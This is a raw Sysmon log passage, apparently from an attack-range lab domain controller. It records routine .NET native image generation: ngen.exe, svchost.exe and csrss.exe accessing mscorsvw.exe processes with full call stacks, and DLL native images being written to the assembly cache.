13:23:30.438{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45D2-6000-C302-000000009A01}3976C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006932Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:30.298{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45D2-6000-C202-000000009A01}3728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006931Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:30.282{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45D2-6000-C202-000000009A01}3728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006930Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:30.282{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45D2-6000-C202-000000009A01}3728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006929Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:30.126{08A6967A-45CF-6000-C102-000000009A01}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1380-0\System.Web.DataVisualization.dll2021-01-14 13:23:30.126 10341000x80000000000000006942Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:31.110{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45D3-6000-C502-000000009A01}3832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006941Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:31.095{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45D3-6000-C502-000000009A01}3832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006940Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:31.095{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45D3-6000-C502-000000009A01}3832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006946Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:32.720{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45D4-6000-C602-000000009A01}4648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006945Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:32.720{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45D4-6000-C602-000000009A01}4648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006944Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:32.720{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45D4-6000-C602-000000009A01}4648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006943Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:32.579{08A6967A-45D3-6000-C502-000000009A01}3832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\ef8-0\System.Web.Extensions.dll2021-01-14 13:23:32.579 10341000x80000000000000006960Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:33.938{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45D5-6000-CA02-000000009A01}4220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006959Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:33.938{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45D5-6000-CA02-000000009A01}4220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006958Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:33.938{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45D5-6000-CA02-000000009A01}4220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006957Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:33.798{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45D5-6000-C902-000000009A01}4728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006956Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:33.798{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45D5-6000-C902-000000009A01}4728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006955Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:33.798{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45D5-6000-C902-000000009A01}4728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006954Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:33.735{08A6967A-45D5-6000-C802-000000009A01}4800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12c0-0\System.Web.DynamicData.Design.dll2021-01-14 13:23:33.735 10341000x80000000000000006953Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:33.579{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45D5-6000-C802-000000009A01}4800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006952Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:33.579{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45D5-6000-C802-000000009A01}4800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006951Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:33.579{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45D5-6000-C802-000000009A01}4800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006950Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:33.438{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45D5-6000-C702-000000009A01}2936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006949Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:33.423{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45D5-6000-C702-000000009A01}2936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006948Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:33.423{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45D5-6000-C702-000000009A01}2936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006947Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:33.345{08A6967A-45D4-6000-C602-000000009A01}4648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1228-0\System.Web.DynamicData.dll2021-01-14 13:23:33.345 10341000x80000000000000006971Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:34.907{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45D6-6000-CD02-000000009A01}4276C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006970Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:34.892{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45D6-6000-CD02-000000009A01}4276C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006969Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:34.892{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45D6-6000-CD02-000000009A01}4276C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30